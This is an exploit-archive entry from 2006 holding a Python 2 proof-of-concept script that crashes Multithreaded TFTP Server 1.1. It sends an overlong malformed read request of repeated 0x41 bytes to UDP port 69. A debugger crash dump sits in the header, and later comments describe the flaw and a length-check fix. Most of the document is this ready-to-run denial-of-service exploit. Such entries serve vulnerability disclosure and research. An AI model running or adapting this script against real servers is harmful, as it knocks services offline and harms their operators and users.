Multithreaded TFTP <= 1.1 (Long Get Request) Denial of Service Exploit

2006-09-08T00:00:00
ID 1337DAY-ID-6200
Type zdt
Reporter n00b
Modified 2006-09-08T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            ======================================================================
Multithreaded TFTP <= 1.1 (Long Get Request) Denial of Service Exploit
======================================================================




#!/usr/bin/python
#Multithreaded TFTP 1.1 Server d0s exploit by n00b
#the following is affected causing a denial of service
#Due to an overly long GET request to the TFTP server
###########################################################################

#Tested on winx xp sp1,sp2 eng.
#Vendor dont know but s00n will :p
#n00b is credited for finding this dos exploit.
#Vendor web site:http://sourceforge.net/projects/tftp-server/
#Im sry if it look's a little messy as python isn't
#my strong point.Also i would like to thank milw0rm for
#all there help over the year's and to ignted's.com
#And also big shout to <Aelphaeis Mangarae> And any-one else i forgot ^ ^.
############################################################################

#                            \\DEBUG INF0//
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=77c5a76e ebx=77c5a7a0 ecx=77c318f2 edx=77c5cac8 esi=00407253 edi=41414141

#eip=77c44257 esp=00f9ff20 ebp=00f9ff2c iopl=0         nv up ei pl nz na po nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206

#*** ERROR: Symbol file could not be found.  Defaulted to export symbols.

#msvcrt!wcsxfrm+0x11d:
#77c44257 8a27             mov     ah,[edi]                ds:0023:41414141=??
############################################################################


import socket
# Python 2 script: print statements, and the str literal below is sent as raw bytes.
#
# Defender summary: the datagram built below is a malformed TFTP read request
# whose filename field is one long run of 0x41 ('A') bytes with no terminator.
# The debug dump in the header (edi=41414141, "mov ah,[edi]" inside msvcrt)
# suggests the server copies the request into a fixed buffer and later
# dereferences the overwritten value, so the server-side fix is to length-check
# the request before copying it (or to run a patched/current server build).
# On the wire, the request stands out as an unusually large UDP/69 datagram
# consisting almost entirely of one repeated byte.

# Set up a UDP socket
# SOCK_DGRAM: TFTP runs over UDP, so no handshake precedes the send.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# send
# \x00\x01 is TFTP opcode 1 (RRQ / read request, RFC 1350). A well-formed RRQ
# follows the opcode with a NUL-terminated filename and a NUL-terminated mode
# string; neither terminator is present here. The triple-quoted literal is
# used verbatim, so the line breaks and leading spaces between the \x41 runs
# are also part of the bytes that get sent.
n00bstring ='''\x00\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
           '''

# Target is hard-coded to the local machine; 69/udp is the TFTP well-known port.
HOSTNAME = '127.0.0.1'
PORTNO = 69
# On a UDP socket connect() only records the default destination; nothing is
# transmitted until send() below.
s.connect((HOSTNAME, PORTNO))
# send() returns the number of bytes handed to the kernel; a short send is
# treated as fatal.
if len(n00bstring) != s.send(n00bstring):
   # where to get error message "$!". (Perl-ism; in Python a failing send()
   # raises socket.error rather than returning a short count.)
   print "cannot send to %s(%d):" % (HOSTNAME,PORTNO)
   raise SystemExit(1)
MAXLEN = 1024
# No timeout is set on the socket, so this blocks indefinitely if no reply
# arrives. addr is the (ip, port) pair the datagram came from.
(data,addr) = s.recvfrom(MAXLEN)
s.close()
print '%s(%d) said "%s"' % (addr[0],addr[1], data)


